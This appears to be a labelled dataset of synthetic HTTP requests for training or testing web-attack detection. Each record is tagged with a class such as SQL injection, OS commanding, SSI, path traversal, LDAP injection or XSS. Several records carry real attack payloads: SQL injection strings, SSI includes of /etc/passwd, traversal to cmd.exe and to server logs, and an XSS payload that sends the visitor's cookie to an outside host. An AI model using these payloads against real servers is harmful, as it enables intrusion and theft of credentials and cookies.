ETag: W/"sDKuASrOdbuBMPpSmEw"
Expect: 100-continue
From: an4poes@ktzh.com
If-Modified-Since: Wed, 20 May 09 05:42:01 UTC
If-Unmodified-Since: Sun, 04 Apr 10 11:30:12 CET
If-Match: *
If-None-Match: "v2EW69CIUg3iNHIfe92O"
If-Range: "uYqCyPZHoc7kpuw"
Max-Forwards: 9937
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic cnhhZWk6b29zVlN2
Authorization: Digest opaque="zteiR"
Range: 9042-41
Referer: /lnoteeoO/atrcrh.conf
TE: chunked;q=0.0,gzip;q=0.5,deflate;q=0.8
Trailer: If-None-Match
User-Agent: 0IoTI7meqt
UA-CPU: x86
UA-Disp: 8135,7731,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 6100x360
Via: 1.3 251.181.165.92
Transfer-Encoding: gzip
Upgrade: sunttk/5.8, ubia/9.5, deoo/2.0, zOw/5.6, cxc/4.5
Warning: 145 165.132.233.207 "niz6ueo" "Sun, 02 Mar 08 13:20:23 UTC"
X-Forwarded-For: 142.75.180.148
X-Serial-Number: 040193563593
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35766
Start - Id: 38603
class: LdapInjection
GET /n4c/igNti/shutdownd0or/Iec7/oltoawanu/9raReyeyat/MtmpperlFyinI5qkiservicesX.jpeg?aehhhesay=05748901&osedtati=ttgos%29%28++++%7C++%28Hoosk%3D*%29&eE5=97284&iimgZFExtdrHV=sosFTohioniehftjtw HTTP/1.1
Host: 81.227.159.77:94
Connection: keep-alive
Accept: audio/*, application/*
Accept-Charset: isiri-3342;q=0.2, koi8-r;q=0.5, us-ascii
Accept-Encoding: deflate, compress;q=0.5
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 227.194.180.19
Cookie: isfb=541078
Cookie2: $Version="7"
Date: Tue, 01 May 07 17:45:17 UTC
ETag: "ZI6YvHYnve_YscV4gGI"
Expect: trilhrm
From: Henr0sl4@nexht.fr
If-Modified-Since: Sat, 17 Mar 07 19:18:02 GMT
If-Unmodified-Since: Sat, 21 Jun 08 05:38:38 GMT
If-Match: *
If-None-Match: "CC0NWthY0Da5Qa46LH"
If-Range: Sat, 25 Jun 05 18:21:41 CET
Max-Forwards: 09
MIME-Version: 8.6
Pragma: wasllh=sN
Proxy-Authorization: Digest nc=aD8e32C0
Authorization: NTLM YWRiZW9EaHB1cUN6cmdkbDdpdHJuY250NG9haGVkOXFkSWV3bmNlTnU1ZQ==
Range: -348176
Referer: http://yicEc.uk/seoe/eeW2spfn/8lswee/sfIzoe/ayacec.jpeg
TE: chunked;q=0.6
Trailer: Max-Forwards
User-Agent: Mozilla/5.4 (compatible; Konqueror/3.1; Linux i586; nleOr; luzumbfrm)
UA-CPU: Sparc
UA-Disp: 7529,000,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 5664x146
Via: HTTP/8.5 www.ci3rth.gif
Transfer-Encoding: compress
Upgrade: orntea/9.1, iEl/1.0, nny/7.6
Warning: 156 www.amoaxg.gif "c0dtoegins4aneef" 
X-Forwarded-For: 248.9.49.144
X-Serial-Number: 325446948
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38603
Start - Id: 44304
class: OsCommanding
GET /iisadmpwd/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: 79.188.244.226
Connection: irRs
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 18.62.79.179
Cookie: uiao=v:t;b9adtisiucnhSda=NtllargineEaha;ifbt=vr665oenrtneoYmt;eameb0ende=autoexecall;qvaPij=s o5a
Cookie2: $Version="583"
Date: Wed, 25 Aug 04 18:03:09 CET
ETag: "z-wEaS4pP5@ex2B"
Expect: 100-continue
From: l1Bt7@hnsv2sT9.net
If-Modified-Since: Mon, 26 Jul 04 09:17:10 CET
If-Unmodified-Since: Sun, 06 Feb 05 20:30:58 GMT
If-Match: "8Qzcs0Ith50ujetsKzuz"
If-None-Match: *
If-Range: "s.hEqU.cPuTTxXWS"
Max-Forwards: 0470
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Digest nc=47dBd7FC
Authorization: NTLM dDljZDVuZEppbXBlbG55ZHJ0ZXVpdHU0aXJEbXVwc29heG90d0tQZ2VlZFc=
Range: 3-
Referer: /s1httd3a/esEeox.bin
TE: deflate,chunked,trailers
Trailer: Expect
User-Agent: euTs/8.1.1.5
UA-CPU: PowerPC
UA-Disp: 9070,4804,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 521x0746
Via: 1.3 www.wttans.png:729
Transfer-Encoding: identity
Upgrade: ott9i/7.1, tei/4.6
Warning: 525 251.120.159.217 "ay2yetttoyyhQsouLs" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 7359375071
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44304
Start - Id: 42494
class: SqlInjection
GET /hyahneVAnoa/an/yjDeiwae9ehaN/maFPyi4.shtml?cwIEsaeeac7itFx=nygsA&JqcA2servicespasswdVnS=%27+++++OR++++%27%27++%3D%27&ucnzumnd=08125435&spsFeourax10ehi=+%40x4&ilctc=eed0&lPbsa=jBs HTTP/1.1
Host: 45.41.25.206:55
Connection: keep-alive
Accept: application/*;q=0.8, audio/*
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=8
Client-ip: 160.117.251.89
Cookie: ti5usa=e3$&5hrm;al=a06C;56CJMe0@0=nmw/7iurestdin;2n3dtqioyco=28181;ot=216
Cookie2: $Version="45"
Date: Tue, 16 Dec 08 17:10:43 GMT
ETag: W/"5YJ9gTlr.4GpRna"
Expect: 100-continue
From: sheo@RafNi.uk
If-Modified-Since: Sat, 13 Dec 08 22:31:16 UTC
If-Unmodified-Since: Tue, 06 Sep 05 14:11:54 CET
If-Match: "QnVZmaloNW8fUWoq"
If-None-Match: "WrRlEYwBtyEH_RMYX"
If-Range: Sun, 12 Jun 05 01:03:43 GMT
Max-Forwards: 546
MIME-Version: 9.9
Pragma: sstby6ci='57Ylbtvo'
Proxy-Authorization: tnrr qtclsQSi=e3eg
Authorization: utooek cAhe=prlkCm
Range: 7-59040
Referer: http://www.iuees.biz/tcsrze/uaemih/Asoy/Nwtri.gif
TE: gzip;q=0.7,trailers
Trailer: Transfer-Encoding
User-Agent: drto8ndao0/1.8.1.6
UA-CPU: x86
UA-Disp: 3013,748,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 733x829
Via: HTTP/2.0 www.zumt.gif, FTP/2.8 www.lenU4t9o.htm
Transfer-Encoding: beonz
Upgrade: ihs/6.9, sw1v/7.0, tkg/8.2, rtlu/7.8, heTt/3.6
Warning: 210 56.86.237.225 "csttoifnOdeql" "Sat, 01 Mar 08 16:31:34 CET"
X-Forwarded-For: 25.37.30.27
X-Serial-Number: 029543372781579317
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42494
Start - Id: 44181
class: OsCommanding
GET /scripts/..�../..�../mssql7/install/pubtext.bat" & dir c:\ .exe? HTTP/1.1
Host: www.ltAsaseese.ch
Connection: close
Accept: image/*, image/gif;q=0.7
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: xi='ahtxep6m'
Client-ip: 148.106.30.191
Cookie: mxml_PYallL@t=80542634;r7honq=aianof9s0tw3iri;Nadenejch=an 1lsnuyn dead
Cookie2: $Version="67"
Date: Wed, 28 Jan 09 04:16:15 CET
ETag: W/"M9dWmzaYsbHXIY4Lq7Am"
Expect: 100-continue
From: ulnbn@Ssrnr.st
If-Modified-Since: Wed, 14 Sep 05 11:17:45 GMT
If-Unmodified-Since: Mon, 27 Aug 07 01:54:37 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 77
MIME-Version: 4.3
Pragma: o='lraiEa6'
Proxy-Authorization: Basic d2x0ZTJlcmM6bnNsbWk=
Authorization: Digest opaque="Henvik"
Range: 5-,-97,-5
Referer: http://www.uTw3aad.net/aeeeoe/0e5seRaq.sh
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/1.5 (compatible; Konqueror/5.0; WinNT; h0iiime3)
UA-CPU: StrongARM
UA-Disp: 054,707,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 389x154
Via: HTTP/6.8 www.oeAoDdn.jpg, 2.5 97.136.49.86
Transfer-Encoding: identity
Upgrade: llemvt/2.2, yAhrud/8.0, Cskdn/9.3
Warning: 582 219.244.0.242 "hesneeTg" "Fri, 08 May 09 19:31:58 UTC"
X-Forwarded-For: 103.223.39.110
X-Serial-Number: 338223
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44181
Start - Id: 39790
class: SSI
GET /6R@5S6BU4/d6o-ibNUO@neU3PN4eV/nz7ipX.@EkTh.y1Yu/iHAG4WLwhere3c65Lp/n04nect/seern/Eetkmaqiema8Uc4A.dll?lall1ftpJinsert=stienistdinic%3B&mdnD5oxAo=974&sh=semnf&n8cmk6ebtOfExvo=3277670&-k_piZY=fdocumentmtb&JL7unionx_ko2w=sBTSH&jnaiduylexcpe=uaAtfime&aOa=%3C%21--++++%23include+++++virtual%3D%22%2Fetc%2Fpasswd%22+++++--%3E&7waeDaibe=dlib HTTP/1.0
Host: 221.104.157.39
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: eioeatw-mepyoidh;q=0.0, d2r-o;q=0.0
Cache-Control: no-store
Client-ip: 129.26.179.125
Cookie: me=hnhitaaaselect;heneiia7tatbial=ns@YYrNu;nr=4404926;xik=o2GvR0c3pPxH;sznrreiahho=0dlEr
Cookie2: $Version="9"
Date: Sun, 10 Apr 05 23:09:57 UTC
ETag: W/"Ne7FULYkvbu.-BWNg_8"
Expect: 100-continue
From: otit3le@ijlhneot1o.com
If-Modified-Since: Fri, 03 Mar 06 12:51:03 CET
If-Unmodified-Since: Sat, 25 Apr 09 15:44:44 GMT
If-Match: "bHJKkxda8xbD6vUFfSP"
If-None-Match: "QkGjakNT_idqLCD_P@U"
If-Range: Mon, 14 Feb 05 17:45:30 UTC
Max-Forwards: 5732
MIME-Version: 2.0
Pragma: i=no
Proxy-Authorization: Digest nc=Ca5d26eD
Authorization: NTLM b1JSc0VobndhOTllZW1JenR2a2xzZG5lb2RGNXBYN25xcGk4aHllNA==
Range: 538-81062,0-593619
Referer: http://www.ne9degh.cz/aGdeiase/fddecmtc/klpteth.asmx
TE: gzip,chunked;q=0.2
Trailer: Upgrade
User-Agent: Mozilla/0.2 (Machintosh; U; PPC 4.5; cw-ht; rv:2.3.0) Gecko/64894423
UA-CPU: Sparc
UA-Pixels: 181x202
Via: FTP/5.9 www.snhelRO2.css, 6.3 www.amdrli.shtml, HTTP/3.4 105.227.173.161
Transfer-Encoding: deflate
Upgrade: oLt/5.9, tEgb/6.9, 6laet/2.7, faare2/0.4, vst20/6.5
X-Serial-Number: 39977076241136
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39790
Start - Id: 39826
class: SSI
GET /KhXW7/dtetsNc29pitwrbl/msExhn7ejgRtUuvgdi6a/irleibtphakcf3iR/gFoiw9a6itnimwlq3nw/o-E@yhfPGwWG2/rj_ew9vWDP/su/WhIYOHxp_-i.gJU3/eleaf.asmx?qxdoa1l=%3C%21--%23include++virtual%3D%22%2Fetc%2Fpasswd%22++--%3E&bc0huj=bm2ncptEis HTTP/1.1
Host: www.oqsesii3O.fr
Connection: keep-alive
Accept: audio/*, image/*
Accept-Charset: iso-8859-8-i;q=0.2, x-mac-arabic, windows-874, iso-8859-7;q=0.7, euc-tw;q=0.4
Accept-Language: *
Date: Fri, 25 Feb 05 05:45:57 GMT
Expect: 100-continue
If-Modified-Since: Tue, 29 Mar 05 09:55:41 CET
If-None-Match: "JzlGIhn0gT3lm0Y@l"
Max-Forwards: 4
Referer: /mstmmzet/6ihto.cfm
Trailer: Trailer
User-Agent: lddlgbaoUasGwfht
Via: FTP/9.9 www.t7alhddD.jpg, FTP/4.2 www.m3dh8.gif, 0.7 29.145.26.32

null

End - Id: 39826
Start - Id: 44692
class: PathTransversal
PUT /Ed.htm? HTTP/1.1
Content-Length: 282
Content-Language: be2saite,v
Content-Encoding: gzip
Content-Location: /a5an.png
Content-MD5: dHNlc2VxbW1lVW1yam5PYg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 25 Jul 08 07:23:01 UTC
Last-Modified: Sun, 06 Jan 08 06:18:01 CET
Host: www.aMtzqmkn.de:1
Connection: onghiE
Accept: */*;q=0.6
Accept-Charset: x-mac-greek;q=0.0
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 110.199.234.60
Cookie: onytsai7iet=l;09ukQ4NV7s2=3465;inorFnh4=3;iw6amgoaEheytn=r9tecsaKsrlIzF
Cookie2: $Version="90"
Date: Mon, 08 Oct 07 24:31:32 CET
ETag: "RHf0qrb9mHL2t__f2YB"
Expect: saene=nf9tcCm
From: nC0otao@cuVsd.gov
If-Modified-Since: Fri, 02 Jul 04 24:37:04 CET
If-Unmodified-Since: Tue, 01 Dec 09 16:18:34 GMT
If-Match: *
If-None-Match: "SxwS.Y-e6CXloS1Q"
If-Range: *
Max-Forwards: 613
Pragma: no-cache
Authorization: NTLM OW5sczlldGxBaGYzY2luZWJmc3ZmZXRvcnl0bWRlMW9oeWE=
Range: 2168-,8-1607,73-
Referer: http://www.nfNsdc.it/i1xai9un/geoetoet/esll/neadnmf/talrafe.gz
TE: trailers,trailers,gzip
Trailer: If-Unmodified-Since
User-Agent: izrjPo http://www.9agia.ch
UA-CPU: StrongARM
UA-Disp: 7865,313,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 136x0173
Via: 9.0 www.wq8egtn.jpeg:3069, Loaed/5.6 www.frdar.css
Transfer-Encoding: gzip
Upgrade: eeew/6.4, 8ei/8.8, dN4/7.3, mAm9/3.5
Warning: 868 www.gmor.js "Hn5xrhit" 
X-Forwarded-For: 121.97.240.234
X-Serial-Number: 175251
----: ---------------------------------------------

has=334&jopenveTfromnph-t=6668717&thwitlt4eoy=680451&plhyLbi=meta ;5dtnh]otia&5l7ontkinej3=7Eqnnh3Es5quanhe&Mtj=T-e &tje3=file:///h:/cs/n6o9l/ime7.xml&Sj-nPlbG.lF=lcer&3fZ4mr=8671&-GIrt@7@childz=01806&ryedehbseehm=22807&Nkw7hd=i2HhL7wZm&enhAws0tehy0=nWia_jKWdQHD

End - Id: 44692
Start - Id: 36433
class: OsCommanding
GET /bin/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.0
Host: www.cpsalHgp.com
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-arabic
Accept-Encoding: gzip;q=0.7, identity;q=0.7, identity;q=0.0, deflate
Accept-Language: *
Cache-Control: min-fresh=1220
Client-ip: 154.253.32.73
Date: Sun, 04 Jun 06 20:58:25 UTC
ETag: W/"vq3qcmJoxo@2pB4G"
Expect: ajatsei7=hn7Hs
From: AtjrnsE@aethffn.uk
If-Modified-Since: Fri, 23 Jan 04 01:41:08 UTC
If-Unmodified-Since: Mon, 16 Nov 09 23:26:40 CET
If-Match: *
If-None-Match: "q3nw4Hh5awqlkPsi"
If-Range: Mon, 04 Apr 05 08:15:50 GMT
Max-Forwards: 5145
MIME-Version: 0.7
Pragma: ons0xyr='imf'
Referer: http://www.bAd3i.fr/ocee.swf
TE: deflate;q=0.4
Trailer: Trailer
User-Agent: oNkA4V http://www.l59erhcn.ch
UA-CPU: PowerPC
UA-Color: color16
UA-Pixels: 006x6469
Via: 4.5 130.9.42.96
Transfer-Encoding: heUo; qzNau=Cdeo
Warning: 176 3.53.123.242 "nltteLtvtattssrC" 
X-Forwarded-For: 113.116.65.59

null

End - Id: 36433
Start - Id: 44747
class: PathTransversal
GET /uhieraiKt/rhihAeut7oerdens6/aeB5tEo6ptniereepc/6@bbfJHix/iz8sAkRFGc/inputYdtmpIiframeLZcatYTp/nywuP7XMdZK/aTeh95iptsT/tOio5sHnQ9L-PKn-F-V/pZd1MfI/D8maC/g@d1.asmx?Niod3helossNfno=wwTR&0jdeu=1666564&iny3eudmm=gSz-K&aerfSsg9rr=i5&ytomgudnuH2n=Aeieas%3Fg%3Cf%7Coa3bieiyb&9mtaiae=edner1tah00&IeeIocmptaepq=r%3Den%7Er+tqnegskocs&sveTsm3nrae=.%2F..%2F.%2F..%2F&PiframegDl=1&NAU@nyB=reaosEednuh6&a3Xrsa4seoAeik=131612&s3he8e=ee HTTP/1.0
Host: www.atnE.cz
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-15;q=0.6
Accept-Encoding: compress;q=0.3
Accept-Language: e-mtw;q=0.6, rt-tdceleh1, qda-ipaw2wd
Cache-Control: d5ei='q0r1'
Client-ip: 239.84.56.120
Cookie: yswjvo=gZgi7;wclYsnyeeyqreo=i1rtn
Cookie2: $Version="80"
Date: Sat, 09 May 09 09:57:40 UTC
ETag: "pRYdV20JSOUG4g2by2Bw"
Expect: seeEneF
From: rairnenr@fiohetan.org
If-Modified-Since: Fri, 29 Jul 05 22:39:46 UTC
If-Unmodified-Since: Sat, 06 Dec 08 17:25:50 GMT
If-Match: *
If-None-Match: *
If-Range: "isGqpE53p-LmxJdZ-hE_"
Max-Forwards: 4396
MIME-Version: 4.7
Pragma: no-cache
Authorization: Digest nonce
Range: 96-3178
Referer: /or7eilha.mdb
TE: gzip,trailers,deflate;q=0.6
Trailer: TE
User-Agent: Mozilla/2.8 (Machintosh; U; Mac OS X 0.9; sn-zp; rv:4.1.8) Gecko/78490113
UA-CPU: 68000
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 7624x8326
Via: Ieukni/7.3 www.Iksh.jpg, FTP/8.6 www.go795Ci.gif, HTTP/7.2 69.246.49.53
Transfer-Encoding: a7t2da
Upgrade: Qya/6.2
Warning: 004 www.hraiWc.shtml:490 "nb9ae9ph" "Wed, 28 Apr 10 17:57:42 GMT"
X-Forwarded-For: 23.27.136.158
X-Serial-Number: 7113830026427564096
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44747
Start - Id: 46244
class: PathTransversal
GET /iehzrj3Lebaea/nK/Cdabaehx/ii1hbao/6-betweenG6zphp4BAbodyht.bin?hr2x9iersotoas=4809691&ngeDyiiite=htaccesltut%29%3D6%27&u2dhk4skainno6g=+wgetWso7nul9r%5Besl&PaRNUwgetfFs9Pr=nZp2&pSe=27&seomonjsaeTtod=8450&a8aTxaD=E1zgnro&T1iou=ltsecnsh&eslnR6h=227684&SodOqh8ieneNnei=A6%3Deeui&eokSio=SM&aIrs=sadEr6t&Diiqltestesm=txv7tUKF7IJY&Ivltthhht33a=..%2F..%2F..%2F..%2Fvar%2Flog%2Faccess_log%2500.html&sanrserqne=akdte HTTP/1.1
Host: www.j3UErxUn8.net
Connection: igglUh
Accept: */*;q=0.8
Accept-Charset: windows-874, iso-8859-2;q=0.6, x-mac-cyrillic
Accept-Encoding: gzip, compress, gzip
Accept-Language: bjRaikwl-6mmp;q=0.3, ltYErca-Tttaa;q=0.3, nsasfke-eeoti;q=0.4, en3-nObrut;q=0.6, t-lcptneD
Cache-Control: max-age=52941
Client-ip: 231.150.7.86
Cookie: gnewsaljo8hvp=dtstThN8jceNiz;Coile=0875961;iisiyu1o4Doal=e;8ne2=e|y3tobjectjphp at>hspe;yitO3ddeen8et3=d4e
Cookie2: $Version="79"
Date: Sun, 01 Feb 09 17:25:19 UTC
ETag: W/"4GaIFePkNWXt7fmQSf7"
Expect: 100-continue
From: eftra@neleobejy.com
If-Modified-Since: Tue, 24 Nov 09 19:46:52 UTC
If-Unmodified-Since: Wed, 28 Apr 10 07:27:19 UTC
If-Match: *
If-None-Match: *
If-Range: "VA_J42qK6ZzOnXatb"
Max-Forwards: 20
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest uri=http://a8bl.ch/noetzkll/itbnanre/awsc.jsp
Authorization: NTLM bm92ZW9vc29lb3lyaWVMbnNiZW5saWVqdG5hMnFBbWVjNm50Y2U5Y2lpUnVoYXBy
Range: 56-3,6-
Referer: /ofxmsLow/loass.shtml
TE: deflate;q=0.9,trailers
Trailer: If-None-Match
User-Agent: Mozilla/0.0 (Windows; U; WinNT 8.7; hl-46; rv:5.8.7) Gecko/84331549
UA-CPU: 68000
UA-Disp: 3006,9406,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7340x8822
Via: HTTP/6.2 184.179.137.239
Transfer-Encoding: deflate
Upgrade: tk5t/9.1
Warning: 061 www.aomelt.jpeg "e3tta" "Tue, 23 Jan 07 20:12:20 GMT"
X-Forwarded-For: 211.19.211.211
X-Serial-Number: 79986231728889
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46244
Start - Id: 41791
class: SqlInjection
GET /lbba6preloxI5pnlfatt/boUMC/iwv/0f3mr/sem7el.mspx?oaEcjsju=moixbtet&lanxcfrooee=0686193&NV@MRZ9A=2094633&dlro=As+h%27wbf&cutyOpeyihjTn=+wo4h8&onbTdm=Mrduohefw+%5C%2Fr%2707&ceeEtrnethoanyR=thth&eidnrihg=OR+++++%27fieaslUa%27++IN++++%28++%27++%27%29&X3Zxp_bexecC=af%3A+&smh-cJhaccept=88543796&qzdrmErsepqrAi=eyaelikektxdtrd%3Ca%3F&as1=ode&Bpn0ayaE2doe=00 HTTP/1.0
Host: 232.93.219.25
Connection: close
Accept: image/jpeg, video/*
Accept-Charset: euc-jp, x-mac-chinesetrad, x-mac-roman, iso-2022-jp;q=0.2, macintosh;q=0.8
Accept-Encoding: 
Accept-Language: nwkelT-runyja3;q=0.7, e-actknr;q=0.1, 84sasJ-rrfsqhtZ
Cache-Control: min-fresh=6776
Client-ip: 112.56.209.56
Cookie: aBTurewxmt=teuhrItne;htnronddugn=processing-instructionrnr43;mo=eT;dttoaislon= /ue
Cookie2: $Version="3"
Date: Thu, 17 Feb 05 06:16:27 CET
ETag: W/"ZXEXElr@0LpV3YJGdbm"
Expect: onotkol
From: nIeior@tiriRlyas.net
If-Modified-Since: Mon, 25 Apr 05 05:39:38 CET
If-Unmodified-Since: Tue, 30 Jan 07 01:15:39 CET
If-Match: "8Pum.frRG9Mt@OdzqDl"
If-None-Match: "EPch6cTst6aE8s6O8W"
If-Range: *
Max-Forwards: 41
MIME-Version: 3.3
Pragma: ethitl='se1lbtU'
Proxy-Authorization: bn6u eNiil=ettssimU
Authorization: nkoe63 beoeYB=Norx
Range: 82059-
Referer: http://AeatosBb.ch/iwlae1/shn6sn/tdvsorFi.php3
TE: gzip,trailers,deflate;q=0.4
Trailer: User-Agent
User-Agent: Mozilla/1.5 (Machintosh; U; PPC 1.0; t5-ni; rv:7.2.1) Gecko/24779459
UA-CPU: x86
UA-Disp: 885,1136,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 832x0332
Via: FTP/8.6 46.11.234.136, FTP/4.2 www.al5aNwo.js:35, 0.1 114.78.57.184
Transfer-Encoding: gzip
Upgrade: ooo/9.2, 8pcmnn/1.5
Warning: 427 www.8olrst6.htm "ebeailudhhwot9" "Fri, 06 May 05 23:48:51 GMT"
X-Forwarded-For: 234.161.201.75
X-Serial-Number: 79451842006720281
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41791
Start - Id: 47190
class: XSS
GET /bfP@JZB5jwdLy0Uk/uursan/hri9/it8hYJ29qgfcoPx-hA9p/ioeajtecu3d/swsG/syPRCLMVbAFl8fbx8/vMYall01HYV1FtJ.shtml?trMieohhwhis=7001714507&rm=%40eo&iotiofrdrrifrsr=32219&tswct3=0319564&3abuehg5n=o6nu&nhsfey9Nllhdyf=369&fm3rd=7743&qefiqNcpienwt=4itrttwn&yvnwErYSis=%3Cimg+dynsrc%3D+%22javascript%3A++%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.ndna.com%2Fcgi-bin%2Far.cgi%27%2Bdocument.cookie%29%3B%5D++%22+%3E&snshoi=eecaa6u&y9td2slfl=p1aeot9Ekjn&tt=0d+wftpAaz HTTP/1.1
Host: www.evIDeoyib.com:80
Connection: keep-alive
Accept: text/*
Accept-Charset: cp-936;q=0.6
Accept-Encoding: 
Accept-Language: e0t-tptb7QE
Cache-Control: only-if-cached
Client-ip: 34.140.216.85
Cookie: hAkWZwhereZlxy=761856;gnhtraapraduog=0552;ksEramree5i=it5rr ;chdrf69adhe=davareea;unoaeehl=try's:Aft/@q;WQechoIGPmuSC=c4tbbdQ
Cookie2: $Version="81"
Date: Sun, 12 Feb 06 03:07:12 UTC
ETag: W/"VIOyLhdnttX6YT6Fjx"
Expect: hreanoe
From: 7wria@hsclhu.org
If-Modified-Since: Sat, 12 Dec 09 14:37:03 UTC
If-Unmodified-Since: Sat, 16 Sep 06 22:49:57 UTC
If-Match: *
If-None-Match: *
If-Range: "g6gWNOYgM7.UL1S"
Max-Forwards: 2
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: n0ntl bt2Ndpz=9yldlwu
Authorization: NTLM dmJ1YWZrZVpvY2NhdXg0bGdpcnRldG1yM2U5bmVsb2tleW5peUk=
Range: 671-463
Referer: http://www.3a3rte.fr/nos22RMt/Ggmrtnr/ansn.dll
TE: trailers
Trailer: If-None-Match
User-Agent: edhnl8t6ao (y8UNkwSH; h0DZ0dXGax)
UA-CPU: 68000
UA-Disp: 934,693,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 739x565
Via: tw9f/9.3 6.85.199.44:3144
Transfer-Encoding: deflate
Upgrade: 7hadcl/7.9, 8tJSt/5.4, qlttea/4.8
Warning: 683 181.248.214.19 "qlt9unMovxwdh" "Tue, 18 Jan 05 01:02:04 UTC"
X-Forwarded-For: 25.149.50.16
X-Serial-Number: 533969856895
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47190
Start - Id: 42664
class: SqlInjection
GET /alfofrnxrbneiidaes/soe/m2.cgi?ohccstainuixa=etmct&atdse6eosar=dzpYallUJ&lcn=7&ihsey6whbt=2NJDfTjMgM&5MBknull5l-=4297717&gkTa=OR+++%27N7u%27+++BETWEEN+%27R%27++AND+++%27T%27&niHihtaaYhN0de=tel&tArtiosnaq=nueW3oqM4nF&detGgTsT=qruph7&haavsOstrsie=00793546&he=6947&m9=733210 HTTP/1.1
Host: www.sAne6eti.st
Connection: ison
Accept: audio/basic
Accept-Charset: *
Accept-Encoding: *
Accept-Language: 1nl-exs0ncmr, ndstr-rfms;q=0.4, h-aqodsws, aaeh2pei-eafdotf;q=0.2, Or6ea-li
Cache-Control: ycY='cehdis'
Cookie2: $Version="1"
Date: Fri, 15 Aug 08 10:25:55 GMT
ETag: W/"l.gpCOT9l_T0QwKSgq"
Expect: 100-continue
If-Modified-Since: Wed, 03 Sep 08 22:08:14 UTC
If-Unmodified-Since: Tue, 21 Sep 04 15:36:48 CET
If-Match: *
If-None-Match: "Wz6QvjY4qmlVN6EL_-"
Max-Forwards: 0
MIME-Version: 8.1
Pragma: i=i
Proxy-Authorization: Basic eWFlckVMOnI3NHRu
Authorization: Basic czNyZTpydTdQYWk2cw==
Referer: http://www.kgsuou9.st/htdgxam/eEih/rdee9n.jpg
TE: chunked;q=0.8,deflate;q=0.0
User-Agent: Mozilla/8.7 (Machintosh; U; Mac OS X 7.0; ri-hh; rv:6.8.8) Gecko/82179787
Via: 9.8 2.190.10.226:9843, FTP/6.3 www.wixo.jpg:0
Transfer-Encoding: ceosom
Warning: 783 www.chvaonf.html "Tvnj8wlTdlch3nhl" "Mon, 08 Mar 04 04:17:40 CET"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42664
Start - Id: 39858
class: SSI
PUT /EJzDs/ioean/aPI5qz.eBi/eFpZmAjK.n/U_S2Ml7@rXYyLrD/styleAaKESDtelnetPD80a/si.htm? HTTP/1.0
Content-Length: 238
Content-Language: ben7,hoxswh
Content-Encoding: deflate
Content-Location: /txotj3.asmx
Content-MD5: MHRuaGRub2JkTnRpN2lzaA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 18 Feb 05 20:05:10 GMT
Last-Modified: Thu, 03 Nov 05 13:55:48 UTC
Host: 147.159.191.4:948
Connection: close
Accept: video/*, video/quicktime, video/*
Accept-Charset: cp-936, windows-1252
Accept-Encoding: 
Accept-Language: yiuknsf-u9t;q=0.5, oreaLe-uo4e, u-esftlN;q=0.2, nr-chcnta, hi-rs;q=0.1
Cache-Control: max-stale=666
Client-ip: 100.245.19.33
Cookie: ceanossem=<!-- #include    virtual="/etc/passwd"   -->
Cookie2: $Version="813"
Date: Mon, 19 Jun 06 13:32:27 GMT
From: hia8uni@Odac.de
If-Modified-Since: Sat, 09 Dec 06 09:41:59 CET
If-Unmodified-Since: Thu, 25 Sep 08 10:30:31 UTC
If-Match: "uEd8w2Cky.KRf6PGLrIm"
If-None-Match: *
Max-Forwards: 55
Proxy-Authorization: Digest nonce
Authorization: Basic dGQ4OGE1bm46Y3Fnbg==
